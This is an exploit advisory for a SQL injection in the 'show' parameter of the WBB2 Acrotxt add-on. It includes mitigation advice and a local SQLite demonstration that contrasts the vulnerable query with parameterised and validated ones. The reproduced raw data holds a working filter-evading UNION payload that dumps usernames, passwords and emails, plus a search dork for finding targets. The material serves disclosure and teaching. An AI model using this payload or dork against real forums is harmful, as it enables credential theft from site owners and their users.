Vendor: WBB2-Addon: Acrotxt v1
By: D4m14n
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: WBB2-Addon: Acrotxt v1
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection

The 'show' parameter of acrotxt.php is placed into an SQL query without parameterisation or validation. The query quotes the value as a string literal, so a single quote breaks out of it; the proof of concept below appends a UNION SELECT with eight columns (the number the add-on's own SELECT must return) that reads userid, username, password and email from the bb1_users table, then comments out the rest of the original statement with a trailing /*. Because the add-on renders the result, a remote attacker can read arbitrary tables from the forum database, including the user table. The /**/ in place of spaces and the mixed-case keywords in the PoC are there to slip past naive keyword filters; the injection itself does not need them.

Mitigation:

The fix is to use parameterised queries (prepared statements): the value of 'show' is then sent to the database separately from the SQL text, so a quote inside it can never change the structure of the statement. This is not "sanitising" the input, which is exactly what keyword filters fail at (see the comment and case tricks in the PoC); it removes the problem rather than filtering for it. Since 'show' appears to be a numeric record id, the add-on should additionally reject anything that is not an integer before it reaches the query, and database errors should be logged rather than echoed into the page, where they give an attacker feedback for tuning the injection. Running the forum's database user with only the privileges it needs does not close the bug but limits what a UNION can pull out.
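The following is an added example and is not code from the advisory or from the Acrotxt add-on (whose source is not on this page). It reproduces the technique on an in-memory SQLite database with a constructed stand-in schema: the table names acrotxt and bb1_users come from the PoC, but the column names of acrotxt, the sample rows, and the exact shape of the vulnerable query are assumptions. A CONCAT function is registered so the advisory's payload runs unchanged; everything else is stock Python. The vulnerable string-built query is shown beside the parameterised and validated forms the mitigation calls for.

```python
import re
import sqlite3

# The injection string from the advisory's PoC, i.e. everything after "show=".
PAYLOAD = (
    "-1'/**/UnIoN/**/SElECt/**/null,null,"
    "COnCAt(userid,', ',username,', ',password,', ',email),"
    "null,null,null,null,null/**/FroM/**/bb1_users/*"
)


def build_db():
    """Constructed stand-in for the forum database (assumption: the real WBB2
    schema is not on the page).  bb1_users carries the four columns the PoC
    names; acrotxt gets eight columns because the UNION supplies eight values,
    which means the add-on's own SELECT returns eight.  Rows are made up."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no CONCAT in older releases; register one so the PoC runs
    # unchanged.  SQLite function names are case-insensitive, so COnCAt
    # resolves to it, just as MySQL would resolve it.
    conn.create_function("concat", -1, lambda *args: "".join(str(a) for a in args))
    conn.executescript("""
        CREATE TABLE bb1_users (userid INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO bb1_users VALUES (1, 'admin', 'hash-of-admin-pw', 'admin@example.invalid');
        INSERT INTO bb1_users VALUES (2, 'alice', 'hash-of-alice-pw', 'alice@example.invalid');
        CREATE TABLE acrotxt (id INTEGER, acronym TEXT, expansion TEXT,
                              c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);
        INSERT INTO acrotxt VALUES (1, 'WBB', 'WoltLab Burning Board', '', '', '', '', '');
    """)
    return conn


def vulnerable_sql(show):
    """String-built query of the kind the advisory describes (hypothetical;
    the add-on's real query is not on the page).  The quoted literal is what
    the PoC's leading -1' breaks out of, and the trailing ORDER BY is what its
    closing /* comments away."""
    return f"SELECT * FROM acrotxt WHERE id='{show}' ORDER BY id"


def vulnerable_lookup(conn, show):
    """The bug: user input becomes SQL text, so the PoC's UNION is executed."""
    return conn.execute(vulnerable_sql(show)).fetchall()


def parameterized_lookup(conn, show):
    """Hardened form: the value travels as a bound parameter, never as SQL
    text, so the whole payload is compared as one opaque string against id
    and simply matches nothing."""
    return conn.execute(
        "SELECT * FROM acrotxt WHERE id=? ORDER BY id", (show,)
    ).fetchall()


def validated_lookup(conn, show):
    """Parameterisation plus input validation: show is a record id, so
    anything that is not an unsigned integer is rejected before any SQL runs.
    Returns None for rejected input so the caller can answer with an error
    page instead of a database error message."""
    if not re.fullmatch(r"[0-9]+", show):
        return None
    return parameterized_lookup(conn, int(show))


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, legitimate id 1:", vulnerable_lookup(db, "1"))
    print("vulnerable, PoC payload, rows pulled from bb1_users:")
    for row in vulnerable_lookup(db, PAYLOAD):
        print("   leaked:", row[2])
    print("parameterized, PoC payload:", parameterized_lookup(db, PAYLOAD))
    print("validated, PoC payload:", validated_lookup(db, PAYLOAD))
```

Run stand-alone, the vulnerable lookup returns one bb1_users row per user with userid, username, password and email concatenated into the third column, which is the column the add-on would render; the parameterised lookup returns an empty result for the same input, and the validated one refuses it before a query is built. Note that the trailing /* in the PoC only works because the original statement continues after the injected value; SQLite, like MySQL, treats an unterminated comment as running to the end of the statement.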

Exploit-DB raw data:

####################################################################
Title: WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection
Bug by: D4m14n [11/07/2007]
Page: www.damians-world.dl.am // www.team-internet.dl.am
Dork: inurl:acrotxt.php wbb
####################################################################

SQL-Injection:
http://[target]/[path]/acrotxt.php?show=[SQL]

Example:
/acrotxt.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,', ',username,', ',password,', ',email),null,null,null,null,null/**/FroM/**/bb1_users/*

####################################################################
#    Doin' this for FUN!
#    GreetZ fly out to Trex, HANN!BAL, Eddy14, Ea$y, Kiba and many more
#
#    PS: I still hate the Black-Music-Scene...
####################################################################

# milw0rm.com [2007-08-27]